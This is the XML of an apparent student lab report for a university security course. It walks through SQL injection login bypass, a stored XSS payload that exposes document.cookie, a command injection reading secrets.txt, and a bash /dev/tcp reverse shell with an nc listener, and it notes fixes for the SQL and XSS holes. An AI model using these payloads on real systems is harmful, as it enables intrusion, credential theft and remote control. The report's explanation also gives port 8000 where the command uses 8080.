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5E946" w14:textId="77777777" w:rsidR="00392F64" w:rsidRDefault="00C1235D" w:rsidP="00170B40">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50.020 Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2512F693" w14:textId="758F0AD1" w:rsidR="00C1235D" w:rsidRDefault="00962B94" w:rsidP="00170B40">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Laura Ong</w:t>
      </w:r>
      <w:r w:rsidR="00C1235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2464</w:t>
      </w:r>
      <w:r w:rsidR="00C1235D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A3E91" w14:textId="77777777" w:rsidR="00C1235D" w:rsidRDefault="00C1235D" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498F205C" w14:textId="77777777" w:rsidR="00C1235D" w:rsidRDefault="00C1235D" w:rsidP="00170B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Part 1: SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D9418A" w14:textId="13A4895D" w:rsidR="00C1235D" w:rsidRDefault="00962B94" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B415FD" w14:textId="03E328AC" w:rsidR="00C1235D" w:rsidRDefault="00C1235D" w:rsidP="00170B40">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C1235D">
        <w:t>alice@alice.com’--</w:t>
      </w:r>
      <w:r w:rsidR="00962B94">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9BFC6A" w14:textId="110BED26" w:rsidR="00962B94" w:rsidRPr="00C1235D" w:rsidRDefault="00962B94" w:rsidP="00962B94">
      <w:r>
        <w:t xml:space="preserve">was typed in for SQL injection in the username. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBC4FFF" w14:textId="77777777" w:rsidR="00C1235D" w:rsidRDefault="00C1235D" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The string works because ‘-- effectively discards the rest of the string: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘ indicates</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the command has ended, while -- indicates start of a comment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955AF3F" w14:textId="77777777" w:rsidR="00C1235D" w:rsidRDefault="00C1235D" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The executed SQL would then be: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2730D3E9" w14:textId="77777777" w:rsidR="00C1235D" w:rsidRDefault="00C1235D" w:rsidP="00170B40">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00C1235D">
        <w:t>SELECT * FROM users WHERE email='alice@alice.com’'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173E6B30" w14:textId="77777777" w:rsidR="00C1235D" w:rsidRDefault="00A8122E" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The attack can be prevented by checking the input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2C63C" w14:textId="77777777" w:rsidR="00A8122E" w:rsidRDefault="00A8122E" w:rsidP="00170B40">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A8122E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="492400EF" wp14:editId="0544B42F">
            <wp:extent cx="5727700" cy="468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468630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9BD5AD" w14:textId="77777777" w:rsidR="00A8122E" w:rsidRDefault="00A8122E" w:rsidP="00170B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6860F435" w14:textId="77777777" w:rsidR="00C1235D" w:rsidRDefault="00C1235D" w:rsidP="00170B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Part 2: XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A859574" w14:textId="77777777" w:rsidR="001B1C4B" w:rsidRDefault="001B1C4B" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B1C4B">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Second order attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C37B2E" w14:textId="77777777" w:rsidR="00C1235D" w:rsidRDefault="001B1C4B" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistent injection is done by inserting the following string into the Post News, between the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62200">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62200">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635946BC" w14:textId="7E0E539D" w:rsidR="001B1C4B" w:rsidRDefault="00EE3C9A" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.write(‘cookie:’ + document.cookie);&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06AA9C69" wp14:editId="35AB2FE2">
            <wp:extent cx="5727700" cy="3505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orde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505200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB8EE2" w14:textId="77777777" w:rsidR="001B1C4B" w:rsidRDefault="001B1C4B" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A56638" w14:textId="77777777" w:rsidR="001B1C4B" w:rsidRPr="001B1C4B" w:rsidRDefault="001B1C4B" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>First order attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4F3E65" w14:textId="77777777" w:rsidR="00993379" w:rsidRDefault="00993379" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">First order attack code still needs to be injected because cookies are stored in the browser for each domain name. When a piece of code from domain name A is requesting cookies from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>a different domain name B, the browser immediately will block the access to cookies stored for domain name A. Hence code needs to be injected directly onto the site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19908A" w14:textId="77777777" w:rsidR="001B1C4B" w:rsidRDefault="001B1C4B" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35CAF4E5" w14:textId="77777777" w:rsidR="00E5657B" w:rsidRPr="00E5657B" w:rsidRDefault="00E5657B" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Prevent XSS attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4621CB49" w14:textId="77777777" w:rsidR="001B1C4B" w:rsidRDefault="001B1C4B" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The XSS attacks can be prevented by removing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62200">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>|safe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tag at the &lt;li&gt; part when displaying news: (before: XSS-prone; after: XSS-prevented)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19807E0C" w14:textId="77777777" w:rsidR="001B1C4B" w:rsidRDefault="001B1C4B" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B1C4B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AD32AAC" wp14:editId="7218E159">
            <wp:extent cx="2888055" cy="130288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0350" cy="1321962"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="001B1C4B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F89FD81" wp14:editId="2BCF268A">
            <wp:extent cx="2598370" cy="1306284"/>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2617" cy="1328528"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7170539F" w14:textId="77777777" w:rsidR="00671EC5" w:rsidRDefault="00671EC5" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D44DC9D" w14:textId="77777777" w:rsidR="00671EC5" w:rsidRDefault="00671EC5" w:rsidP="00170B40">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Part 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D07BEE" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="003D2016" w:rsidRDefault="003D2016" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D2016">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2F2DE8" w14:textId="6828F8A4" w:rsidR="00C62200" w:rsidRDefault="00C62200" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:r w:rsidR="00EE3C9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">putting </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EE3C9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00416205">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00416205">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>;cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00416205">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> secrets</w:t>
      </w:r>
      <w:r w:rsidR="00EE3C9A">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in the ping box, we can obtain the content of file secrets. This works because the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> command is being put directly into the command line without clean up. This allows</w:t>
      </w:r>
      <w:r w:rsidR="00EE3C9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a semicolon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to separate the command lines, allowing us to write the next command to be executed on the server machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F00EBF5" w14:textId="0A7519A9" w:rsidR="00416205" w:rsidRDefault="00C62200" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62200">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>cat secrets</w:t>
      </w:r>
      <w:r w:rsidR="00EE3C9A">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">basically print out the content of file </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62200">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC3A58" w14:textId="3D4CD9E7" w:rsidR="00EE3C9A" w:rsidRDefault="00EE3C9A" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48504CFB" wp14:editId="35E78D30">
            <wp:extent cx="5727700" cy="3505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injectoin.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505200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2168E535" w14:textId="77777777" w:rsidR="00416205" w:rsidRDefault="00416205" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502DD581" w14:textId="77777777" w:rsidR="00671EC5" w:rsidRDefault="00993379" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096498FF" w14:textId="77777777" w:rsidR="00F02F12" w:rsidRDefault="00F02F12" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[On Linux]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E2E06" w14:textId="77777777" w:rsidR="00993379" w:rsidRDefault="00F02F12" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The command to be run in the attacker machine is: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02F12">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02F12">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l -p 8080 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02F12">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>vvv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19488FA6" w14:textId="77777777" w:rsidR="00F02F12" w:rsidRDefault="00F02F12" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The command to be injected into the website is: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBB8356" w14:textId="77777777" w:rsidR="00F02F12" w:rsidRDefault="00F02F12" w:rsidP="00170B40">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>8.8.8.8; bash -c ‘bash –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/127.0.0.1/8080 0&gt;&amp;1’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA3E47" w14:textId="49662C21" w:rsidR="00F02F12" w:rsidRDefault="00F02F12" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This works because the command run in the attacker machine opens up an unfiltered TCP connection at port 8080, waiting for connection to be established to the port. The injected command then allows a bash compilation that establishes an interactive shell (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> option) using an unfiltered TCP connection to 127.0.0.1:8000. This allows the listening shell at the attacker machine a way to control the interactive shell at the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB7CF9E" w14:textId="436EFB1B" w:rsidR="00EE3C9A" w:rsidRPr="00F02F12" w:rsidRDefault="00EE3C9A" w:rsidP="00170B40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13A417A6" wp14:editId="2E799AFC">
            <wp:extent cx="5727700" cy="3505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verseshell.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505200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00EE3C9A" w:rsidRPr="00F02F12" w:rsidSect="00C814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altName w:val="Calibri"/>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64"/>
    <w:rsid w:val="00170B40"/>
    <w:rsid w:val="001B1C4B"/>
    <w:rsid w:val="001C5000"/>
    <w:rsid w:val="00392F64"/>
    <w:rsid w:val="003B428C"/>
    <w:rsid w:val="003D2016"/>
    <w:rsid w:val="00416205"/>
    <w:rsid w:val="00595CE5"/>
    <w:rsid w:val="00671EC5"/>
    <w:rsid w:val="0093290A"/>
    <w:rsid w:val="00962B94"/>
    <w:rsid w:val="00993379"/>
    <w:rsid w:val="00A8122E"/>
    <w:rsid w:val="00C1235D"/>
    <w:rsid w:val="00C62200"/>
    <w:rsid w:val="00C81496"/>
    <w:rsid w:val="00E5657B"/>
    <w:rsid w:val="00EE3C9A"/>
    <w:rsid w:val="00F02F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F38E"/>
  <w14:defaultImageDpi w14:val="32767"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EBDBA6D2-6033-7A49-B94D-E1DD4100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3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3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23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3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23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235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235D"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00C1235D"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="00C1235D"/>
    <w:rPr>
      <w:rFonts w:ascii="Monaco" w:hAnsi="Monaco"/>
      <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
      <w:sz w:val="22"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="00C1235D"/>
    <w:rPr>
      <w:rFonts w:ascii="Monaco" w:hAnsi="Monaco"/>
      <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>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Nguyen Trung Huan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Student - Laura Ong Jin Hua</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-02-21T04:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-21T05:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>